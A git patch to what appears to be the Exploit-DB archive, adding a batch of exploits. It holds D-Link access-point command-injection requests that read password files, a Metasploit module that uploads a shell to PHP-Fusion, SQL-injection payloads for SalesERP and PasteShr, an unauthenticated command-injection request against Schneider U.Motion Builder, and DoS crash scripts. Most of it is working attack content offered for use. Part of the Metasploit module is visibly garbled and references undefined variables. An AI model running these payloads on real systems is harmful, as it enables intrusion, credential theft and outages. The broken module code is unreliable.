From b04843e5cbc751fcdf41c3a60d2d2d046c06c111 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 15 May 2019 05:01:56 +0000 Subject: [PATCH] DB: 2019-05-15 9 changes to exploits/shellcodes Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC) PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit) Sales ERP 8.1 - Multiple SQL Injection D-Link DWL-2600AP - Multiple OS Command Injection Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection PasteShr 1.6 - Multiple SQL Injection --- exploits/hardware/webapps/46841.txt | 351 ++++++++++++++++++++++++++++ exploits/php/remote/46839.rb | 206 ++++++++++++++++ exploits/php/webapps/46840.txt | 85 +++++++ exploits/php/webapps/46846.txt | 109 +++++++++ exploits/php/webapps/46847.txt | 78 +++++++ exploits/windows/dos/46842.py | 22 ++ exploits/windows/dos/46843.py | 22 ++ exploits/windows/dos/46844.py | 22 ++ exploits/windows/dos/46845.py | 20 ++ files_exploits.csv | 9 + 10 files changed, 924 insertions(+) create mode 100644 exploits/hardware/webapps/46841.txt create mode 100755 exploits/php/remote/46839.rb create mode 100644 exploits/php/webapps/46840.txt create mode 100644 exploits/php/webapps/46846.txt create mode 100644 exploits/php/webapps/46847.txt create mode 100755 exploits/windows/dos/46842.py create mode 100755 exploits/windows/dos/46843.py create mode 100755 exploits/windows/dos/46844.py create mode 100755 exploits/windows/dos/46845.py diff --git a/exploits/hardware/webapps/46841.txt b/exploits/hardware/webapps/46841.txt new file mode 100644 index 000000000..58a5afeed --- /dev/null +++ b/exploits/hardware/webapps/46841.txt @@ -0,0 +1,351 @@ +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. + +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=config_restore + +Vulnerable POST Form Data Parameter: +[+] configRestore +[+] configServerip +=========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by local authenticated attackers. +there is no input validation on the POST Form Data Parameter "configRestore" +and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg . + + +--- PoC Session Logs --- +POST /admin.cgi?action=config_restore HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 357 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; +User-Agent: Xxxxxxxx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=config_restore +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E + +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="optprotocol" + +up +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="configRestore" + +;whoami; +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="configServerip" + +;cat /var/passwd;cat /var/passwd +------WebKitFormBoundary4ZAwHsdySFjwNXxE-- + + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;command2 + + +----+Discovered By Raki Ben Hamouda----+ + + +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. + +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=config_save + +Vulnerable POST Form Data Parameter: +[+] configBackup +[+] downloadServerip +========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote or local authenticated attackers. +there is no input validation on the POST Form Data Parameter "configBackup" +and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg . + +--- PoC Session Logs --- +POST /admin.cgi?action=config_save HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 114 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Xxxxxxxx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=config_save +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E + +check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd + + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +sh: .xml: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;etc... + + +----+Discovered By Raki Ben Hamouda----+ + + +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. + +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=upgrade + +Vulnerable POST Form Data Parameter: +[+] firmwareRestore +[+] firmwareServerip + +=========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by local authenticated attackers. +there is no input validation on the POST Form Data Parameter "firmwareRestore" +and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg . + +--- PoC Session Logs --- + +POST /admin.cgi?action=upgrade HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 525 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; +User-Agent: xxxxxxxxw +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=upgrade +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E + +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="optprotocol" + +up +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="firmwareRestore" + +;whoami;whoami +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="firmwareServerip" + +;cat /var/passwd;cat /var/passwd +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="update.device.packet-capture.stop-capture" + +up +------WebKitFormBoundaryBy0MsFaBOhdU6YJL-- + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;etc... +----+Discovered By Raki Ben Hamouda----+ \ No newline at end of file diff --git a/exploits/php/remote/46839.rb b/exploits/php/remote/46839.rb new file mode 100755 index 000000000..571c0d384 --- /dev/null +++ b/exploits/php/remote/46839.rb @@ -0,0 +1,206 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution", + 'Description' => %q( + This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions. + It is possible to execute commands in the system with ordinary user authority. No need admin privilage. + There is almost no control in the avatar upload section in the profile edit area. + Only a client-based control working with javascript. (Simple pre-check) + If we do not care about this control, the desired file can be sent to the server via Interception-Proxies. + The module opens the meterpreter session for you by bypassing the controls. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module + ], + 'References' => + [ + ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details + ['URL', 'https://www.php-fusion.co.uk'] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "May 11 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']), + OptString.new('USERNAME', [true, "Username to authenticate with", '']), + OptString.new('PASSWORD', [true, "Password to authenticate with", '']) + ] + ) + end + + def exec + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url + }) + end +## +# Login and cookie information gathering +## + def login(uname, pass, check) + # 1st request to get fusion_token + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "home.php") + }) + + cookie = res.get_cookies + @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + # 2nd request to login + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'home.php'), + 'cookie' => cookie, + 'vars_post' => { + 'fusion_token' => @fustoken, + 'form_id' => 'loginform', + 'user_name' => uname, + 'user_pass' => pass, + 'login' => '' + } + ) + + cookie = res.get_cookies + location = res.redirection.to_s + if res && res.code == 302 && location.include?('login.php?error') + fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}") + else + return cookie + end + + return nil + end +## +# Upload malicious file // payload integration +## + def upload_shell(cookie, check) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => cookie + }) + + ncookie = cookie + " " + res.get_cookies # gathering all cookie information + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => ncookie + }) + + # fetch some necessary post data informations + fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + userid = res.body.split("profile.php?lookup=")[1].split('">")[0] + + # data preparation to delete priv avatar + delete = Rex::MIME::Message.new + delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"') + delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"') + delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"') + delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"') + delete.add_part('1', nil, nil, 'form-data; name="delAvatar"') + delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"') + delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') + delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') + delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"') + deld = delete.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => deld, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{delete.bound}", + 'cookie' => ncookie, + 'uri' => normalize_uri(target_uri.path, "edit_profile.php") + }) + # priv avatar deleted. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => cookie + }) + + ncookie = cookie + " " + res.get_cookies # recheck cookies + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => ncookie + }) + + # They changed. fetch again... + fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + userid = res.body.split("profile.php?lookup=")[1].split('">")[0] + # The "php" string must be removed for bypass.We can use " 'POST', + 'data' => data, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", + 'cookie' => ncookie, + 'uri' => normalize_uri(target_uri.path, "edit_profile.php") + }) + + location = res.redirection.to_s + if res && res.code == 302 && location.include?('error') + fail_with(Failure::NoAccess, 'Error occurred during uploading!') + else + print_status("Trying to upload #{fname}") + return true + end + + end +## +# Exploit controls and information +## + def exploit + cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + print_good("Authentication was successful with user: #{datastore['USERNAME']}") + + if upload_shell(cookie, true) + print_good("Control was bypassed. Harmful file upload successfully!") + exec + end + end +## +# The end of the adventure (o_O) // AkkuS +## +end \ No newline at end of file diff --git a/exploits/php/webapps/46840.txt b/exploits/php/webapps/46840.txt new file mode 100644 index 000000000..fdf73fd1d --- /dev/null +++ b/exploits/php/webapps/46840.txt @@ -0,0 +1,85 @@ +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. +=========================================================================================== +# POC - SQLi +# Parameters : customer_id, product_id +# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199 +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL +Inject Here] +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/category/php-scripts?term=sales%20erp +# Software Link: +http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. +=========================================================================================== +# POC - SQLi +# Parameters : supplier_name +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/category/php-scripts?term=sales%20erp +# Software Link: +http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. +=========================================================================================== +# POC - SQLi +# Parameters : supplier_name +# Attack Pattern : 1260781%27 oR +if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT +INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here] +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46846.txt b/exploits/php/webapps/46846.txt new file mode 100644 index 000000000..08f202e6b --- /dev/null +++ b/exploits/php/webapps/46846.txt @@ -0,0 +1,109 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: Schneider Electric U.Motion Builder +Vendor URL: www.schneider-electric.com +Type: OS Command Injection [CWE-78] +Date found: 2018-11-15 +Date published: 2019-05-13 +CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) +CVE: CVE-2018-7841 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +Schneider Electric U.Motion Builder 1.3.4 and below + + +4. INTRODUCTION +=============== +Comfort, Security and Energy Efficiency – these are the qualities that you as +home owner expect from a futureproof building management solution. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The script "track_import_export.php" is vulnerable to an unauthenticated +command injection vulnerability when user-supplied input to the HTTP GET/POST +parameter "object_id" is processed by the web application. Since the application +does not properly validate and sanitize this parameter, it is possible to inject +arbitrary commands into a PHP exec call. This is a bypass to the fix implemented +for CVE-2018-7765. + +The following Proof-of-Concept triggers this vulnerability causing a 10 seconds +sleep: + +POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4 +Content-Type: application/x-www-form-urlencoded +Content-Length: 86 + +op=export&language=english&interval=1&object_id=`sleep 10` + + +6. RISK +======= +To successfully exploit this vulnerability an unauthenticated attacker must only +have network-level access to a vulnerable instance of U.Motion Builder or a product +that depends on it. + +The vulnerability can be used to inject arbitrary OS commands, which leads to the +complete compromise of the affected installation. + + +7. SOLUTION +=========== +Uninstall/remove the installation. + +The product has been retired shortly after notifying the vendor about this issue, +so no fix will be published. + + +8. REPORT TIMELINE +================== +2018-11-14: Discovery of the vulnerability +2018-11-14: Tried to notify vendor via their vulnerability report form + but unfortunately the form returned some 403 error +2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM) +2018-11-19: No response from vendor +2018-11-20: Tried to contact the vendor via Twitter again +2018-11-20: No response from vendor +2019-01-04: Without further notice the contact form worked again. Sent over + the vulnerability details. +2019-01-04: Response from the vendor stating that the affected code is owned by + a third-party vendor. Projected completion time is October 2019. +2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy. +2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15. +2019-01-15: Agreed on the disclosure extension due to the severity of the issue +2019-02-01: No further reply from vendor. Reminded them of the regular status + updates according to the disclosure policy +2019-02-04: Regular status updates from vendor from now on +2019-03-13: Vendor sends draft disclosure notification including assigned + CVE-2018-7841. The draft states that the product will be retired + and has already been removed from the download portal. A customer + notification is published (SEVD-2019-071-02). +2019-03-14: Public disclosure is delayed to give the vendor's customers a chance + to remove the product. +2019-05-13: Public disclosure + + +9. REFERENCES +============= +https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day \ No newline at end of file diff --git a/exploits/php/webapps/46847.txt b/exploits/php/webapps/46847.txt new file mode 100644 index 000000000..502195b7e --- /dev/null +++ b/exploits/php/webapps/46847.txt @@ -0,0 +1,78 @@ +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. +=========================================================================================== +# POC - SQLi +# Parameters : keyword +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. +=========================================================================================== +# POC - SQLi +# Parameters : password +# Attack Pattern : +/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end) +# POST Method : +http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. +=========================================================================================== +# POC - SQLi +# Parameters : keyword +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# POST Method : +http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here] +=========================================================================================== \ No newline at end of file diff --git a/exploits/windows/dos/46842.py b/exploits/windows/dos/46842.py new file mode 100755 index 000000000..99740f506 --- /dev/null +++ b/exploits/windows/dos/46842.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC) +# Date: 13/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.pixarra.com +# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe +# Version: 2.17 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt" +# 2.- Copy the text from the generated PoC.txt file to clipboard +# 3.- Open Selfie Studio +# 4.- Go to 'Image' > 'Resize Image...' +# 5.- Paste clipboard in the 'New Width/New Height' field +# 6.- Click OK +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("PoC.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46843.py b/exploits/windows/dos/46843.py new file mode 100755 index 000000000..5a23fb73f --- /dev/null +++ b/exploits/windows/dos/46843.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC) +# Date: 13/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.pixarra.com +# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe +# Version: 24.06 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt" +# 2.- Copy the text from the generated PoC.txt file to clipboard +# 3.- Open TwistedBrush Pro Studio +# 4.- Go to 'Image' > 'Resize Image...' +# 5.- Paste clipboard in the 'New Width/New Height' field +# 6.- Click OK +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("PoC.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46844.py b/exploits/windows/dos/46844.py new file mode 100755 index 000000000..6fee45b75 --- /dev/null +++ b/exploits/windows/dos/46844.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC) +# Date: 13/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.pixarra.com +# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe +# Version: 24.06 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt" +# 2.- Copy the text from the generated PoC.txt file to clipboard +# 3.- Open TwistedBrush Pro Studio +# 4.- Go to 'Record' > 'Script Recorder...' +# 5.- Paste clipboard in the 'Description' field +# 6.- Click 'Brush' button +# 7.- Crashed + +buffer = "\x41" * 500000 +f = open ("PoC.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46845.py b/exploits/windows/dos/46845.py new file mode 100755 index 000000000..910329678 --- /dev/null +++ b/exploits/windows/dos/46845.py @@ -0,0 +1,20 @@ +# -*- coding: utf-8 -*- +# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC) +# Date: 13/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.pixarra.com +# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe +# Version: 24.06 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp" +# 2.- Open TwistedBrush Pro Studio +# 3.- Go to 'Record' > 'Script Player...' +# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button +# 5.- Crashed + +buffer = "\x41" * 500000 +f = open ("sample.srp", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3dc6fb404..cc245b1cc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6422,6 +6422,10 @@ id,file,description,date,author,type,platform,port 46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows, 46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service 